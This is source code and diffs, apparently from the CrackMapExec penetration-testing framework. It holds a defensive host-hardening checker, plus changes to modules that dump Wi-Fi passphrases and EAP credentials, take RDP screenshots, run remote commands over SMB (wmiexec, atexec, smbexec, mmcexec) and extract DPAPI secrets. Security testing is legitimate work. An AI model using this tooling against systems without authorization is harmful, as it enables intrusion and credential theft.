|
||||||
|
elif op == operator.ne:
|
||||||
|
opstring = '{left} != {right}'
|
||||||
|
nopstring = '{left} == {right}'
|
||||||
|
else:
|
||||||
|
opstring = f'{op.__name__}({{left}}, {{right}}) == True'
|
||||||
|
nopstring = f'{op.__name__}({{left}}, {{right}}) == False'
|
||||||
|
|
||||||
|
value = self.reg_query_value(self.dce, self.connection, key, value_name)
|
||||||
|
|
||||||
|
if type(value) == DCERPCSessionError:
|
||||||
|
if options['KOIfMissing']:
|
||||||
|
ok = False
|
||||||
|
if value.error_code in (ERROR_NO_MORE_ITEMS, ERROR_FILE_NOT_FOUND):
|
||||||
|
reasons.append(f'{key}: Key not found')
|
||||||
|
elif value.error_code == ERROR_OBJECT_NOT_FOUND:
|
||||||
|
reasons.append(f'{value_name}: Value not found')
|
||||||
|
else:
|
||||||
|
ok = False
|
||||||
|
reasons.append(f'Error while retrieving value of {key}\\{value_name}: {value}')
|
||||||
|
continue
|
||||||
|
|
||||||
|
if op(value, expected_value):
|
||||||
|
if options['lastWins']:
|
||||||
|
ok = True
|
||||||
|
reasons.append(opstring.format(left=f'{key}\\{value_name} ({value})', right=expected_value))
|
||||||
|
else:
|
||||||
|
reasons.append(nopstring.format(left=f'{key}\\{value_name} ({value})', right=expected_value))
|
||||||
|
ok = False
|
||||||
|
if ok and options['stopOnOK']:
|
||||||
|
break
|
||||||
|
if not ok and options['stopOnKO']:
|
||||||
|
break
|
||||||
|
|
||||||
|
return ok, reasons
|
||||||
|
|
||||||
|
def check_laps(self):
|
||||||
|
reasons = []
|
||||||
|
success = False
|
||||||
|
lapsv2_ad_key_name = 'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\LAPS'
|
||||||
|
lapsv2_aad_key_name = 'Software\\Microsoft\\Policies\\LAPS'
|
||||||
|
|
||||||
|
# Checking LAPSv2
|
||||||
|
ans = self._open_root_key(self.dce, self.connection, 'HKLM')
|
||||||
|
|
||||||
|
if ans is None:
|
||||||
|
return False, ['Could not query remote registry']
|
||||||
|
|
||||||
|
root_key_handle = ans['phKey']
|
||||||
|
try:
|
||||||
|
ans = rrp.hBaseRegOpenKey(self.dce, root_key_handle, lapsv2_ad_key_name)
|
||||||
|
reasons.append(f"HKLM\\{lapsv2_ad_key_name} found, LAPSv2 AD installed")
|
||||||
|
success = True
|
||||||
|
return success, reasons
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
if e.error_code == ERROR_FILE_NOT_FOUND:
|
||||||
|
reasons.append(f"HKLM\\{lapsv2_ad_key_name} not found")
|
||||||
|
|
||||||
|
try:
|
||||||
|
ans = rrp.hBaseRegOpenKey(self.dce, root_key_handle, lapsv2_aad_key_name)
|
||||||
|
reasons.append(f"HKLM\\{lapsv2_aad_key_name} found, LAPSv2 AAD installed")
|
||||||
|
success = True
|
||||||
|
return success, reasons
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
if e.error_code == ERROR_FILE_NOT_FOUND:
|
||||||
|
reasons.append(f"HKLM\\{lapsv2_aad_key_name} not found")
|
||||||
|
|
||||||
|
# LAPSv2 does not seem to be installed, checking LAPSv1
|
||||||
|
lapsv1_key_name = 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\GPextensions'
|
||||||
|
subkeys = self.reg_get_subkeys(self.dce, self.connection, lapsv1_key_name)
|
||||||
|
laps_path = '\\Program Files\\LAPS\\CSE'
|
||||||
|
|
||||||
|
for subkey in subkeys:
|
||||||
|
value = self.reg_query_value(self.dce, self.connection, lapsv1_key_name + '\\' + subkey, 'DllName')
|
||||||
|
if type(value) == str and 'laps\\cse\\admpwd.dll' in value.lower():
|
||||||
|
reasons.append(f'{lapsv1_key_name}\\...\\DllName matches AdmPwd.dll')
|
||||||
|
success = True
|
||||||
|
laps_path = '\\'.join(value.split('\\')[1:-1])
|
||||||
|
break
|
||||||
|
if not success:
|
||||||
|
reasons.append(f'No match found in {lapsv1_key_name}\\...\\DllName')
|
||||||
|
|
||||||
|
l = self.ls(self.connection, laps_path)
|
||||||
|
if l:
|
||||||
|
reasons.append('Found LAPS folder at ' + laps_path)
|
||||||
|
else:
|
||||||
|
success = False
|
||||||
|
reasons.append('LAPS folder does not exist')
|
||||||
|
return success, reasons
|
||||||
|
|
||||||
|
|
||||||
|
l = self.ls(self.connection, laps_path + '\\AdmPwd.dll')
|
||||||
|
if l:
|
||||||
|
reasons.append(f'Found {laps_path}\\AdmPwd.dll')
|
||||||
|
else:
|
||||||
|
success = False
|
||||||
|
reasons.append(f'{laps_path}\\AdmPwd.dll not found')
|
||||||
|
|
||||||
|
return success, reasons
|
||||||
|
|
||||||
|
def check_last_successful_update(self):
|
||||||
|
records = self.connection.wmi(wmi_query='Select TimeGenerated FROM Win32_ReliabilityRecords Where EventIdentifier=19', namespace='root\\cimv2')
|
||||||
|
if len(records) == 0:
|
||||||
|
return False, ['No update found']
|
||||||
|
most_recent_update_date = records[0]['TimeGenerated']['value']
|
||||||
|
most_recent_update_date = most_recent_update_date.split('.')[0]
|
||||||
|
most_recent_update_date = time.strptime(most_recent_update_date, '%Y%m%d%H%M%S')
|
||||||
|
most_recent_update_date = time.mktime(most_recent_update_date)
|
||||||
|
now = time.time()
|
||||||
|
days_since_last_update = (now - most_recent_update_date)//86400
|
||||||
|
if days_since_last_update <= OUTDATED_THRESHOLD:
|
||||||
|
return True, [f'Last update was {days_since_last_update} <= {OUTDATED_THRESHOLD} days ago']
|
||||||
|
else:
|
||||||
|
return False, [f'Last update was {days_since_last_update} > {OUTDATED_THRESHOLD} days ago']
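# Worked example (illustrative): a TimeGenerated value such as '20230401120000.000000-000'
# is truncated at the '.', parsed with '%Y%m%d%H%M%S', converted to an epoch with
# time.mktime(), and (now - then)//86400 yields whole days since the last successful update,
# which is then compared against OUTDATED_THRESHOLD (30 days).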
|
||||||
|
|
||||||
|
def check_administrator_name(self):
|
||||||
|
user_info = self.get_user_info(self.connection, rid=500)
|
||||||
|
name = user_info['UserName']
|
||||||
|
ok = name not in ('Administrator', 'Administrateur')
|
||||||
|
reasons = [f'Administrator name changed to {name}' if ok else 'Administrator name unchanged']
|
||||||
|
return ok, reasons
|
||||||
|
|
||||||
|
def check_guest_account_disabled(self):
|
||||||
|
user_info = self.get_user_info(self.connection, rid=501)
|
||||||
|
uac = user_info['UserAccountControl']
|
||||||
|
disabled = bool(uac & samr.USER_ACCOUNT_DISABLED)
|
||||||
|
reasons = ['Guest account disabled' if disabled else 'Guest account enabled']
|
||||||
|
return disabled, reasons
|
||||||
|
|
||||||
|
def check_spooler_service(self):
|
||||||
|
ok = False
|
||||||
|
service_config, service_status = self.get_service('Spooler', self.connection)
|
||||||
|
if service_config['dwStartType'] == scmr.SERVICE_DISABLED:
|
||||||
|
ok = True
|
||||||
|
reasons = ['Spooler service disabled']
|
||||||
|
else:
|
||||||
|
reasons = ['Spooler service enabled']
|
||||||
|
if service_status == scmr.SERVICE_RUNNING:
|
||||||
|
reasons.append('Spooler service running')
|
||||||
|
elif service_status == scmr.SERVICE_STOPPED:
|
||||||
|
ok = True
|
||||||
|
reasons.append('Spooler service not running')
|
||||||
|
|
||||||
|
return ok, reasons
|
||||||
|
|
||||||
|
def check_wsus_running(self):
|
||||||
|
ok = True
|
||||||
|
reasons = []
|
||||||
|
service_config, service_status = self.get_service('wuauserv', self.connection)
|
||||||
|
if service_config['dwStartType'] == scmr.SERVICE_DISABLED:
|
||||||
|
reasons = ['WSUS service disabled']
|
||||||
|
elif service_status != scmr.SERVICE_RUNNING:
|
||||||
|
reasons = ['WSUS service not running']
|
||||||
|
return ok, reasons
|
||||||
|
|
||||||
|
def check_nbtns(self):
|
||||||
|
key_name = 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NetBT\\Parameters\\Interfaces'
|
||||||
|
subkeys = self.reg_get_subkeys(self.dce, self.connection, key_name)
|
||||||
|
success = False
|
||||||
|
reasons = []
|
||||||
|
missing = 0
|
||||||
|
nbtns_enabled = 0
|
||||||
|
for subkey in subkeys:
|
||||||
|
value = self.reg_query_value(self.dce, self.connection, key_name + '\\' + subkey, 'NetbiosOptions')
|
||||||
|
if type(value) == DCERPCSessionError:
|
||||||
|
if value.error_code == ERROR_OBJECT_NOT_FOUND:
|
||||||
|
missing += 1
|
||||||
|
continue
|
||||||
|
if value != 2:
|
||||||
|
nbtns_enabled += 1
|
||||||
|
if missing > 0:
|
||||||
|
reasons.append(f'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NetBT\\Parameters\\Interfaces\\<interface>\\NetbiosOptions: value not found on {missing} interfaces')
|
||||||
|
if nbtns_enabled > 0:
|
||||||
|
reasons.append(f'NBTNS enabled on {nbtns_enabled} interfaces out of {len(subkeys)}')
|
||||||
|
if missing == 0 and nbtns_enabled == 0:
|
||||||
|
success = True
|
||||||
|
reasons.append('NBTNS disabled on all interfaces')
|
||||||
|
return success, reasons
|
||||||
|
|
||||||
|
def check_applocker(self):
|
||||||
|
key_name = 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\SrpV2'
|
||||||
|
subkeys = self.reg_get_subkeys(self.dce, self.connection, key_name)
|
||||||
|
rule_count = 0
|
||||||
|
for collection in subkeys:
|
||||||
|
collection_key_name = key_name + '\\' + collection
|
||||||
|
rules = self.reg_get_subkeys(self.dce, self.connection, collection_key_name)
|
||||||
|
rule_count += len(rules)
|
||||||
|
success = rule_count > 0
|
||||||
|
reasons = [f'Found {rule_count} AppLocker rules defined']
|
||||||
|
|
||||||
|
return success, reasons
|
||||||
|
|
||||||
|
# Methods for getting values from the remote registry #
|
||||||
|
#######################################################
|
||||||
|
|
||||||
|
def _open_root_key(self, dce, connection, root_key):
|
||||||
|
ans = None
|
||||||
|
retries = 1
|
||||||
|
opener = {
|
||||||
|
'HKLM':rrp.hOpenLocalMachine,
|
||||||
|
'HKCR':rrp.hOpenClassesRoot,
|
||||||
|
'HKU':rrp.hOpenUsers,
|
||||||
|
'HKCU':rrp.hOpenCurrentUser,
|
||||||
|
'HKCC':rrp.hOpenCurrentConfig
|
||||||
|
}
|
||||||
|
|
||||||
|
while retries > 0:
|
||||||
|
try:
|
||||||
|
ans = opener[root_key.upper()](dce)
|
||||||
|
break
|
||||||
|
except KeyError:
|
||||||
|
self.context.log.error(f'HostChecker._open_root_key():{connection.host}: Invalid root key. Must be one of HKCR, HKCC, HKCU, HKLM or HKU')
|
||||||
|
break
|
||||||
|
except Exception as e:
|
||||||
|
self.context.log.error(f'HostChecker._open_root_key():{connection.host}: Error while trying to open {root_key.upper()}: {e}')
|
||||||
|
if 'Broken pipe' in e.args:
|
||||||
|
self.context.log.error('Retrying')
|
||||||
|
retries -= 1
|
||||||
|
return ans
|
||||||
|
|
||||||
|
def reg_get_subkeys(self, dce, connection, key_name):
|
||||||
|
root_key, subkey = key_name.split('\\', 1)
|
||||||
|
ans = self._open_root_key(dce, connection, root_key)
|
||||||
|
subkeys = []
|
||||||
|
if ans is None:
|
||||||
|
return subkeys
|
||||||
|
|
||||||
|
root_key_handle = ans['phKey']
|
||||||
|
try:
|
||||||
|
ans = rrp.hBaseRegOpenKey(dce, root_key_handle, subkey)
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
if e.error_code != ERROR_FILE_NOT_FOUND:
|
||||||
|
self.context.log.error(f'HostChecker.reg_get_subkeys(): Could not retrieve subkey {subkey}: {e}\n')
|
||||||
|
return subkeys
|
||||||
|
except Exception as e:
|
||||||
|
self.context.log.error(f'HostChecker.reg_get_subkeys(): Error while trying to retrieve subkey {subkey}: {e}\n')
|
||||||
|
return subkeys
|
||||||
|
|
||||||
|
subkey_handle = ans['phkResult']
|
||||||
|
i = 0
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
ans = rrp.hBaseRegEnumKey(dce=dce, hKey=subkey_handle, dwIndex=i)
|
||||||
|
subkeys.append(ans['lpNameOut'][:-1])
|
||||||
|
i += 1
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
break
|
||||||
|
return subkeys
|
||||||
|
|
||||||
|
def reg_query_value(self, dce, connection, keyName, valueName=None):
|
||||||
|
"""
|
||||||
|
Query remote registry data for a given registry value
|
||||||
|
"""
|
||||||
|
def subkey_values(subkey_handle):
|
||||||
|
dwIndex = 0
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
value_type, value_name, value_data = get_value(subkey_handle, dwIndex)
|
||||||
|
yield (value_type, value_name, value_data)
|
||||||
|
dwIndex += 1
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
if e.error_code == ERROR_NO_MORE_ITEMS:
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
self.context.log.error(f'HostChecker.reg_query_value()->sub_key_values(): Received error code {e.error_code}')
|
||||||
|
return
|
||||||
|
|
||||||
|
def get_value(subkey_handle, dwIndex=0):
|
||||||
|
ans = rrp.hBaseRegEnumValue(dce=dce, hKey=subkey_handle, dwIndex=dwIndex)
|
||||||
|
value_type = ans['lpType']
|
||||||
|
value_name = ans['lpValueNameOut']
|
||||||
|
value_data = ans['lpData']
|
||||||
|
|
||||||
|
# Do any conversion necessary depending on the registry value type
|
||||||
|
if value_type in (
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING,
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING_WITH_ENV,
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING_SEQUENCE):
|
||||||
|
value_data = b''.join(value_data).decode('utf-16')
|
||||||
|
else:
|
||||||
|
value_data = b''.join(value_data)
|
||||||
|
if value_type in (
|
||||||
|
REG_VALUE_TYPE_32BIT_LE,
|
||||||
|
REG_VALUE_TYPE_64BIT_LE):
|
||||||
|
value_data = int.from_bytes(value_data, 'little')
|
||||||
|
elif value_type == REG_VALUE_TYPE_32BIT_BE:
|
||||||
|
value_data = int.from_bytes(value_data, 'big')
|
||||||
|
|
||||||
|
return value_type, value_name[:-1], value_data
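# Conversion example (illustrative): a REG_DWORD (type 4) of 1 arrives as little-endian
# bytes, so int.from_bytes(b'\x01\x00\x00\x00', 'little') == 1; a REG_SZ (type 1) arrives
# as UTF-16 data whose decoded string keeps a trailing null, e.g. 'Restricted\x00', which
# is why several expected values above include the '\x00' suffix.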
|
||||||
|
|
||||||
|
try:
|
||||||
|
root_key, subkey = keyName.split('\\', 1)
|
||||||
|
except ValueError:
|
||||||
|
self.context.log.error(f'HostChecker.reg_query_value(): Could not split keyname {keyName}')
|
||||||
|
return
|
||||||
|
|
||||||
|
ans = self._open_root_key(dce, connection, root_key)
|
||||||
|
if ans is None:
|
||||||
|
return ans
|
||||||
|
|
||||||
|
root_key_handle = ans['phKey']
|
||||||
|
try:
|
||||||
|
ans = rrp.hBaseRegOpenKey(dce, root_key_handle, subkey)
|
||||||
|
except DCERPCSessionError as e:
|
||||||
|
if e.error_code == ERROR_FILE_NOT_FOUND:
|
||||||
|
return e
|
||||||
|
|
||||||
|
subkey_handle = ans['phkResult']
|
||||||
|
|
||||||
|
if valueName is None:
|
||||||
|
_,_, data = get_value(subkey_handle)
|
||||||
|
else:
|
||||||
|
found = False
|
||||||
|
for _,name,data in subkey_values(subkey_handle):
|
||||||
|
if name.upper() == valueName.upper():
|
||||||
|
found = True
|
||||||
|
break
|
||||||
|
if not found:
|
||||||
|
return DCERPCSessionError(error_code=ERROR_OBJECT_NOT_FOUND)
|
||||||
|
return data
|
||||||
|
|
||||||
|
# Methods for getting values from SAMR and SCM #
|
||||||
|
################################################
|
||||||
|
|
||||||
|
def get_service(self, service_name, connection):
|
||||||
|
"""
|
||||||
|
Get the service status and configuration for specified service
|
||||||
|
"""
|
||||||
|
remoteOps = RemoteOperations(smbConnection=connection.conn, doKerberos=False)
|
||||||
|
machine_name,_ = remoteOps.getMachineNameAndDomain()
|
||||||
|
remoteOps._RemoteOperations__connectSvcCtl()
|
||||||
|
dce = remoteOps._RemoteOperations__scmr
|
||||||
|
scm_handle = scmr.hROpenSCManagerW(dce, machine_name)['lpScHandle']
|
||||||
|
service_handle = scmr.hROpenServiceW(dce, scm_handle, service_name)['lpServiceHandle']
|
||||||
|
service_config = scmr.hRQueryServiceConfigW(dce, service_handle)['lpServiceConfig']
|
||||||
|
service_status = scmr.hRQueryServiceStatus(dce, service_handle)['lpServiceStatus']['dwCurrentState']
|
||||||
|
remoteOps.finish()
|
||||||
|
|
||||||
|
return service_config, service_status
|
||||||
|
|
||||||
|
def get_user_info(self, connection, rid=501):
|
||||||
|
"""
|
||||||
|
Get user information for the user with the specified RID
|
||||||
|
"""
|
||||||
|
remoteOps = RemoteOperations(smbConnection=connection.conn, doKerberos=False)
|
||||||
|
machine_name, domain_name = remoteOps.getMachineNameAndDomain()
|
||||||
|
|
||||||
|
try:
|
||||||
|
remoteOps.connectSamr(machine_name)
|
||||||
|
except samr.DCERPCSessionError:
|
||||||
|
# If connecting to machine_name didn't work, it's probably because
|
||||||
|
# we're dealing with a domain controller, so we need to use the
|
||||||
|
# actual domain name instead of the machine name, because DCs don't
|
||||||
|
# use the SAM
|
||||||
|
remoteOps.connectSamr(domain_name)
|
||||||
|
|
||||||
|
dce = remoteOps._RemoteOperations__samr
|
||||||
|
domain_handle = remoteOps._RemoteOperations__domainHandle
|
||||||
|
user_handle = samr.hSamrOpenUser(dce, domain_handle, userId=rid)['UserHandle']
|
||||||
|
user_info = samr.hSamrQueryInformationUser2(dce, user_handle, samr.USER_INFORMATION_CLASS.UserAllInformation)
|
||||||
|
user_info = user_info['Buffer']['All']
|
||||||
|
remoteOps.finish()
|
||||||
|
return user_info
|
||||||
|
|
||||||
|
def ls(self, smb, path='\\', share='C$'):
|
||||||
|
l = []
|
||||||
|
try:
|
||||||
|
l = smb.conn.listPath(share, path)
|
||||||
|
except SMBSessionError as e:
|
||||||
|
if e.getErrorString()[0] not in ('STATUS_NO_SUCH_FILE', 'STATUS_OBJECT_NAME_NOT_FOUND'):
|
||||||
|
self.context.log.error(f'ls(): C:\\{path} {e.getErrorString()}')
|
||||||
|
except Exception as e:
|
||||||
|
self.context.log.error(f'ls(): C:\\{path} {e}\n')
|
||||||
|
return l
|
||||||
|
|
||||||
|
# Comparison operators #
|
||||||
|
########################
|
||||||
|
|
||||||
|
def le(reg_sz_string, number):
|
||||||
|
return int(reg_sz_string[:-1]) <= number
|
||||||
|
|
||||||
|
def in_(obj, seq):
|
||||||
|
return obj in seq
|
||||||
|
|
||||||
|
def startswith(string, start):
|
||||||
|
return string.startswith(start)
|
||||||
|
|
||||||
|
def not_(boolean_operator):
|
||||||
|
def wrapper(*args, **kwargs):
|
||||||
|
return not boolean_operator(*args, **kwargs)
|
||||||
|
wrapper.__name__ = f'not_{boolean_operator.__name__}'
|
||||||
|
return wrapper
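# Usage sketch for these helpers (values are illustrative):
#   le('10\x00', 2)                                    -> False  (REG_SZ count compared as int)
#   in_(32, (32, 255))                                 -> True
#   startswith('https://wsus.corp.local', 'https://')  -> True   (hypothetical WSUS URL)
#   not_(operator.contains)('1.0 2.0 3.0', '2.0')      -> False  (PowerShell v2 is available)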
|
|
@@ -74,7 +74,7 @@ class CMEModule:
|
||||||
for wifi_cred in wifi_creds:
|
for wifi_cred in wifi_creds:
|
||||||
if wifi_cred.auth.upper() == "OPEN":
|
if wifi_cred.auth.upper() == "OPEN":
|
||||||
context.log.highlight("[OPEN] %s" % (wifi_cred.ssid))
|
context.log.highlight("[OPEN] %s" % (wifi_cred.ssid))
|
||||||
if wifi_cred.auth.upper() in ["WPAPSK", "WPA2PSK"]:
|
elif wifi_cred.auth.upper() in ["WPAPSK", "WPA2PSK", "WPA3SAE"]:
|
||||||
try:
|
try:
|
||||||
context.log.highlight(
|
context.log.highlight(
|
||||||
"[%s] %s - Passphrase: %s"
|
"[%s] %s - Passphrase: %s"
|
||||||
|
@@ -86,5 +86,29 @@ class CMEModule:
|
||||||
)
|
)
|
||||||
except:
|
except:
|
||||||
context.log.highlight("[%s] %s - Passphrase: %s" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password))
|
context.log.highlight("[%s] %s - Passphrase: %s" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password))
|
||||||
|
elif wifi_cred.auth.upper() in ['WPA', 'WPA2']:
|
||||||
|
try:
|
||||||
|
if self.eap_username is not None and self.eap_password is not None:
|
||||||
|
context.log.highlight(
|
||||||
|
"[%s] %s - %s - Identifier: %s:%s"
|
||||||
|
% (
|
||||||
|
wifi_cred.auth.upper(),
|
||||||
|
wifi_cred.ssid,
|
||||||
|
wifi_cred.eap_type,
|
||||||
|
wifi_cred.eap_username,
|
||||||
|
wifi_cred.eap_password,
|
||||||
|
)
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
context.log.highlight(
|
||||||
|
"[%s] %s - %s "
|
||||||
|
% (
|
||||||
|
wifi_cred.auth.upper(),
|
||||||
|
wifi_cred.ssid,
|
||||||
|
wifi_cred.eap_type,
|
||||||
|
)
|
||||||
|
)
|
||||||
|
except:
|
||||||
|
context.log.highlight("[%s] %s - Passphrase: %s" % (wifi_cred.auth.upper(), wifi_cred.ssid, wifi_cred.password))
|
||||||
else:
|
else:
|
||||||
context.log.highlight("[WPA-EAP] %s - %s" % (wifi_cred.ssid, wifi_cred.eap_type))
|
context.log.highlight("[WPA-EAP] %s - %s" % (wifi_cred.ssid, wifi_cred.eap_type))
|
||||||
|
|
|
@@ -179,7 +179,7 @@ class rdp(connection):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
async def connect_rdp(self):
|
async def connect_rdp(self):
|
||||||
_, err = await self.conn.connect()
|
_, err = await asyncio.wait_for(self.conn.connect(), timeout=self.args.rdp_timeout)
|
||||||
if err is not None:
|
if err is not None:
|
||||||
raise err
|
raise err
|
||||||
|
|
||||||
|
@@ -371,7 +371,7 @@ class rdp(connection):
|
||||||
self.iosettings.supported_protocols = None
|
self.iosettings.supported_protocols = None
|
||||||
self.auth = NTLMCredential(secret="", username="", domain="", stype=asyauthSecret.PASS)
|
self.auth = NTLMCredential(secret="", username="", domain="", stype=asyauthSecret.PASS)
|
||||||
self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)
|
self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)
|
||||||
await self.connect_rdp_old(self.url)
|
await self.connect_rdp()
|
||||||
await asyncio.sleep(int(self.args.screentime))
|
await asyncio.sleep(int(self.args.screentime))
|
||||||
|
|
||||||
if self.conn is not None and self.conn.desktop_buffer_has_data is True:
|
if self.conn is not None and self.conn.desktop_buffer_has_data is True:
|
||||||
|
|
|
@@ -2,7 +2,7 @@ def proto_args(parser, std_parser, module_parser):
|
||||||
rdp_parser = parser.add_parser('rdp', help="own stuff using RDP", parents=[std_parser, module_parser])
|
rdp_parser = parser.add_parser('rdp', help="own stuff using RDP", parents=[std_parser, module_parser])
|
||||||
rdp_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
|
rdp_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
|
||||||
rdp_parser.add_argument("--port", type=int, default=3389, help="Custom RDP port")
|
rdp_parser.add_argument("--port", type=int, default=3389, help="Custom RDP port")
|
||||||
rdp_parser.add_argument("--rdp-timeout", type=int, default=1, help="RDP timeout on socket connection")
|
rdp_parser.add_argument("--rdp-timeout", type=int, default=5, help="RDP timeout on socket connection, defalut is %(default)ss")
|
||||||
rdp_parser.add_argument("--nla-screenshot", action="store_true", help="Screenshot RDP login prompt if NLA is disabled")
|
rdp_parser.add_argument("--nla-screenshot", action="store_true", help="Screenshot RDP login prompt if NLA is disabled")
|
||||||
|
|
||||||
dgroup = rdp_parser.add_mutually_exclusive_group()
|
dgroup = rdp_parser.add_mutually_exclusive_group()
|
||||||
|
@@ -11,7 +11,7 @@ def proto_args(parser, std_parser, module_parser):
|
||||||
|
|
||||||
egroup = rdp_parser.add_argument_group("Screenshot", "Remote Desktop Screenshot")
|
egroup = rdp_parser.add_argument_group("Screenshot", "Remote Desktop Screenshot")
|
||||||
egroup.add_argument("--screenshot", action="store_true", help="Screenshot RDP if connection success")
|
egroup.add_argument("--screenshot", action="store_true", help="Screenshot RDP if connection success")
|
||||||
egroup.add_argument('--screentime', type=int, default=10, help='Time to wait for desktop image')
|
egroup.add_argument('--screentime', type=int, default=10, help='Time to wait for desktop image, default is %(default)ss')
|
||||||
egroup.add_argument('--res', default='1024x768', help='Resolution in "WIDTHxHEIGHT" format. Default: "1024x768"')
|
egroup.add_argument('--res', default='1024x768', help='Resolution in "WIDTHxHEIGHT" format. Default: "1024x768"')
|
||||||
|
|
||||||
return parser
|
return parser
|
|
@@ -665,14 +665,16 @@ class smb(connection):
|
||||||
if self.args.exec_method:
|
if self.args.exec_method:
|
||||||
methods = [self.args.exec_method]
|
methods = [self.args.exec_method]
|
||||||
if not methods:
|
if not methods:
|
||||||
methods = ["wmiexec", "smbexec", "mmcexec", "atexec"]
|
methods = ["wmiexec", "atexec", "smbexec", "mmcexec"]
|
||||||
|
|
||||||
if not payload and self.args.execute:
|
if not payload and self.args.execute:
|
||||||
payload = self.args.execute
|
payload = self.args.execute
|
||||||
if not self.args.no_output:
|
if not self.args.no_output:
|
||||||
get_output = True
|
get_output = True
|
||||||
|
|
||||||
|
current_method = ""
|
||||||
for method in methods:
|
for method in methods:
|
||||||
|
current_method = method
|
||||||
if method == "wmiexec":
|
if method == "wmiexec":
|
||||||
try:
|
try:
|
||||||
exec_method = WMIEXEC(
|
exec_method = WMIEXEC(
|
||||||
|
@@ -687,7 +689,9 @@ class smb(connection):
|
||||||
self.kdcHost,
|
self.kdcHost,
|
||||||
self.hash,
|
self.hash,
|
||||||
self.args.share,
|
self.args.share,
|
||||||
logger=self.logger
|
logger=self.logger,
|
||||||
|
timeout=self.args.wmiexec_timeout,
|
||||||
|
tries=self.args.get_output_tries
|
||||||
)
|
)
|
||||||
self.logger.info("Executed command via wmiexec")
|
self.logger.info("Executed command via wmiexec")
|
||||||
break
|
break
|
||||||
|
@@ -705,7 +709,9 @@ class smb(connection):
|
||||||
self.domain,
|
self.domain,
|
||||||
self.conn,
|
self.conn,
|
||||||
self.args.share,
|
self.args.share,
|
||||||
self.hash
|
self.hash,
|
||||||
|
self.logger,
|
||||||
|
self.args.get_output_tries
|
||||||
)
|
)
|
||||||
self.logger.info("Executed command via mmcexec")
|
self.logger.info("Executed command via mmcexec")
|
||||||
break
|
break
|
||||||
|
@@ -725,7 +731,8 @@ class smb(connection):
|
||||||
self.aesKey,
|
self.aesKey,
|
||||||
self.kdcHost,
|
self.kdcHost,
|
||||||
self.hash,
|
self.hash,
|
||||||
self.logger
|
self.logger,
|
||||||
|
self.args.get_output_tries
|
||||||
) # self.args.share)
|
) # self.args.share)
|
||||||
self.logger.info("Executed command via atexec")
|
self.logger.info("Executed command via atexec")
|
||||||
break
|
break
|
||||||
|
@@ -749,7 +756,8 @@ class smb(connection):
|
||||||
self.hash,
|
self.hash,
|
||||||
self.args.share,
|
self.args.share,
|
||||||
self.args.port,
|
self.args.port,
|
||||||
self.logger
|
self.logger,
|
||||||
|
self.args.get_output_tries
|
||||||
)
|
)
|
||||||
self.logger.info("Executed command via smbexec")
|
self.logger.info("Executed command via smbexec")
|
||||||
break
|
break
|
||||||
|
@@ -761,8 +769,8 @@ class smb(connection):
|
||||||
if hasattr(self, "server"):
|
if hasattr(self, "server"):
|
||||||
self.server.track_host(self.host)
|
self.server.track_host(self.host)
|
||||||
|
|
||||||
|
if "exec_method" in locals():
|
||||||
output = exec_method.execute(payload, get_output)
|
output = exec_method.execute(payload, get_output)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
if not isinstance(output, str):
|
if not isinstance(output, str):
|
||||||
output = output.decode(self.args.codec)
|
output = output.decode(self.args.codec)
|
||||||
|
@@ -773,13 +781,15 @@ class smb(connection):
|
||||||
output = output.strip()
|
output = output.strip()
|
||||||
self.logger.debug(f"Output: {output}")
|
self.logger.debug(f"Output: {output}")
|
||||||
|
|
||||||
if self.args.execute or self.args.ps_execute:
|
if (self.args.execute or self.args.ps_execute) and output:
|
||||||
self.logger.success(f"Executed command {self.args.exec_method if self.args.exec_method else ''}")
|
self.logger.success(f"Executed command via {current_method}")
|
||||||
buf = StringIO(output).readlines()
|
buf = StringIO(output).readlines()
|
||||||
for line in buf:
|
for line in buf:
|
||||||
self.logger.highlight(line.strip())
|
self.logger.highlight(line.strip())
|
||||||
|
|
||||||
return output
|
return output
|
||||||
|
else:
|
||||||
|
self.logger.fail(f"Execute command failed with {current_method}")
|
||||||
|
return False
|
||||||
|
|
||||||
@requires_admin
|
@requires_admin
|
||||||
def ps_execute(
|
def ps_execute(
|
||||||
|
@@ -1456,6 +1466,7 @@ class smb(connection):
|
||||||
|
|
||||||
@requires_admin
|
@requires_admin
|
||||||
def dpapi(self):
|
def dpapi(self):
|
||||||
|
dump_system = False if "nosystem" in self.args.dpapi else True
|
||||||
logging.getLogger("dploot").disabled = True
|
logging.getLogger("dploot").disabled = True
|
||||||
|
|
||||||
if self.args.pvk is not None:
|
if self.args.pvk is not None:
|
||||||
|
@@ -1463,7 +1474,7 @@ class smb(connection):
|
||||||
self.pvkbytes = open(self.args.pvk, "rb").read()
|
self.pvkbytes = open(self.args.pvk, "rb").read()
|
||||||
self.logger.success(f"Loading domain backupkey from {self.args.pvk}")
|
self.logger.success(f"Loading domain backupkey from {self.args.pvk}")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
logging.error(str(e))
|
self.logger.fail(str(e))
|
||||||
|
|
||||||
masterkeys = []
|
masterkeys = []
|
||||||
if self.args.mkfile is not None:
|
if self.args.mkfile is not None:
|
